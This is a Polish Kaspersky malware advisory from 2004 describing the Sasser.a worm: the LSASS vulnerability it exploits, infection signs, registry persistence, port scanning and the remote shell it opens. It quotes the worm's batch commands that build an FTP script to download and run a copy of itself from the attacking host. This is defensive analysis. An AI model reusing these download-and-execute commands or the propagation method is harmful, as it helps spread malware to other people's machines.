Tylko teraz Kaspersky Total Security w cenie Kaspersky Internet Security!  Sprawdź ofertę »

X

UWAGA! Worm.Win32.Sasser.a

Worm.Win32.Sasser.a Jest to robak rozprzestrzeniający się przez internet przy użyciu luki w zabezpieczeniach usługi LSASS systemów Windows. Luka ta została opisana w biuletynie MS04-011 firmy Microsoft. Szkodnik ma rozmiar około 15 KB (kompresja PECompact2) i powstał przy użyciu języka programowania C/C++. Robak atakuje systemy operacyjne Windows 2000, Windows XP oraz Windows Server 2003.

Oznaki infekcji

O zainfekowaniu komputera robakiem Sasser.a mogą świadczyć następujące symptomy:

  • obecność pliku avserve.exe w folderze Windows,
  • pojawianie się komunikatu o wystąpieniu błędu w usłudze LSASS oraz restartowanie się komputera.

Rozprzestrzenianie

Po uruchomieniu robak tworzy w folderze Windows plik avserve.exe oraz klucz auto-run w rejestrze systemowym:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"avserve.exe" = "%Folder Windows%\avserve.exe"

W celu oznaczenia zainfekowanych komputerów Sasser.a tworzy w pamięci RAM unikatowy identyfikator Jobaka31.

Szkodnik uruchamia serwer FTP na porcie TCP 5554, po czym aktywuje 128 procedur rozprzestrzeniających. W tym samym czasie robak podejmuje próbę zainicjowania procesu AbortSystemShutdown, który powoduje ponowne uruchomienie komputera.

W celu zidentyfikowania potencjalnych ofiar Sasser.a skanuje adresy IP i wysyła żądania na port TCP 445. Jeżeli zdalny komputer zezwoli na połączenie, robak instaluje tam (korzystając z luki w zabezpieczeniach LSASS) interpreter poleceń cmd.exe na porcie TCP 9996. Na koniec robak przesyła polecenia, które pobierają go i uruchamiają na atakowanej maszynie. Kopia szkodnika pobierana jest z nazwą N_up.exe, gdzie "N" jest losowym numerem. Oto komendy wysyłane przez Sassera:

echo off
echo open [adres atakowanego komputera] 5554>>cmd.ftp
echo anonymous>>cmd.ftp
echo user
echo bin>>cmd.ftp
echo get [losowy numer]_up.exe>>cmd.ftp
echo bye>>cmd.ftp
echo on
ftp -s:cmd.ftp
[losowy numer]_up.exe
echo off
del cmd.ftp
echo on

W rezultacie na atakowanym komputerze pojawiają się kopie Sassera posiadające (przykładowo) nazwy 23101_up.exe, 5409_up.exe itd.

Informacje dodatkowe

Po zakończeniu ataku zainfekowany komputer generuje komunikat o wystąpieniu błędu w usłudze LSASS, po czym może nastąpić restart komputera.

Sasser.a tworzy w folderze głównym dysku C plik win.log i zapisuje w nim adresy IP wszystkich zainfekowanych komputerów.

Darmowe lekarstwo

Darmowe lekarstwo na robaka Sasser można pobrać tutaj:



 2004-05-04  

© 1997 - 2016 Kaspersky Lab

Wszelkie prawa zastrzeżone.
Lider na rynku rozwišązań antywirusowych